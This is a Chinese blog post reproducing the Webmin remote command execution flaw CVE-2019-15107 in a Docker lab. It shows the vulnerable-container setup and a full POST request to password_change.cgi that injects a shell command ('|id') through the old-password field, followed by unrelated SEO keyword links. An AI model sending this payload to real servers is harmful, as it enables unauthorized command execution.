Webmin RCE漏洞CVE-2019-15107是怎么复现的
发表于:2025-02-04 作者:千家信息网编辑
千家信息网最后更新 2025年02月04日,这篇文章将为大家详细讲解有关Webmin RCE漏洞CVE-2019-15107是怎么复现的,文章内容质量较高,因此小编分享给大家做个参考,希望大家阅读完这篇文章后对相关知识有一定的了解。0x00 前
千家信息网最后更新 2025年02月04日Webmin RCE漏洞CVE-2019-15107是怎么复现的
这篇文章将为大家详细讲解有关Webmin RCE漏洞CVE-2019-15107是怎么复现的,文章内容质量较高,因此小编分享给大家做个参考,希望大家阅读完这篇文章后对相关知识有一定的了解。
0x00 前言
本来前一阵就想复现来着,但是官网的版本已经更新了,直到今天才发现Docker上有环境,才进行了复现
0x01影响版本
Webmin<=1.920
0x02 环境搭建
docker search webmindocker pull piersonjarvis/webmin-sambadocker run -d -p 10000:80 piersonjarvis/webmin-samba
访问你的ip:10000即可访问1.920版本的webmin
使用账号密码:root/webmin登录到后台
开启密码重置功能:
Webmin--Webmin confuration--Authentication
0x03 漏洞利用
经过长时间的寻找,未找到修改密码的接口,所以随便抓个包手动构造了一个,数据包如下:
POST /password_change.cgi HTTP/1.1
Host: 136.244.xx.xx:10000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://136.244.xx.xx:10000/passwd/index.cgi?xnavigation=1
X-PJAX: true
X-PJAX-Container: [data-dcontainer]
X-PJAX-URL: passwd/edit_passwd.cgi?user=root
X-Requested-From: passwd
X-Requested-From-Tab: webmin
X-Requested-With: XMLHttpRequest
Content-Type: text/plain;charset=UTF-8
Content-Length: 49
DNT: 1
Connection: close
user=laemon&old=123123|id&new1=123456&new2=123456
最终执行命令成功
关于Webmin RCE漏洞CVE-2019-15107是怎么复现的就分享到这里了,希望以上内容可以对大家有一定的帮助,可以学到更多知识。如果觉得文章不错,可以把它分享出去让更多的人看到。
漏洞
密码
版本
内容
文章
更多
环境
知识
篇文章
不错
成功
前言
功能
后台
命令
天才
手动
接口
数据
账号
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
勒索病毒再现网络安全成关注焦点
网上数据库转换
北京市京东网络技术有
权限分离数据库设计
北外作业数据库技术答案
乡镇林业站本底调查数据库
服务器硬盘无法放大文件
计算机网络技术要考数学吗
网络安全架构设计pdf
互联网科技出现的时间
科技实践活动 网络安全
微盘交易软件开发报价
数据库表唯一主键id
163pop服务器
dns服务器评测
深圳美鹰软件开发
网络安全的字符图片
打开数据库怎么设置日期
思科网络技术学院教程 心得
小神服务器
网络安全保卫局电话
门亿联网络技术股份有限公司
吃鸡大厅服务器超时
我的世界服务器学校
db2数据库建索引
扶贫数据库管理
长沙电子软件开发学校
神经网络安全变异
建立人员技能数据库专人管理
海通证券 软件开发中心